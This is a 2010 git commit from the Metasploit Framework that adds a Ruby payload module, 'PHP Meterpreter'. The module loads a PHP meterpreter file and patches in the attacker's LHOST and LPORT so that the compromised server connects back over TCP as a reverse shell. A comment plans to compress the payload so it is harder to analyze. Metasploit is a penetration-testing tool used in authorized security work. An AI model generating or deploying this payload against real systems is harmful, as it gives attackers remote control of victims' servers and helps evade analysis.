make the payload name match the standard

git-svn-id: file:///home/svn/framework3/trunk@9534 4d416f70-5f16-0410-b530-b9f4589650da
unstable
James Lee 2010-06-16 16:55:05 +00:00
parent 14706a17e8
commit b03047094d
1 changed files with 49 additions and 0 deletions

View File

@ -0,0 +1,49 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'msf/core/handler/reverse_tcp'
require 'msf/base/sessions/meterpreter_php'
require 'msf/base/sessions/meterpreter_options'
module Metasploit3
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions
def initialize(info = {})
super(update_info(info,
'Name' => 'PHP Meterpreter',
'Version' => '$Revision: 8984 $',
'Description' => 'Run a meterpreter server in PHP that connects to the attacker over TCP',
'Author' => ['egypt'],
'Platform' => 'php',
'Arch' => ARCH_PHP,
'License' => MSF_LICENSE,
'Handler' => Msf::Handler::ReverseTcp,
'Session' => Msf::Sessions::Meterpreter_Php_Php))
end
def generate
file = File.join(Msf::Config.data_directory, "meterpreter", "meterpreter.php")
met = File.open(file, "rb") {|f|
f.read(f.stat.size)
}
met.gsub!("127.0.0.1", datastore['LHOST']) if datastore['LHOST']
met.gsub!("4444", datastore['LPORT']) if datastore['LPORT']
# XXX When this payload is more stable, remove comments and compress
# whitespace to make it smaller and a bit harder to analyze
#met.gsub!(/^ *#/, '')
#met = Rex::Text.compress(met)
met
end
end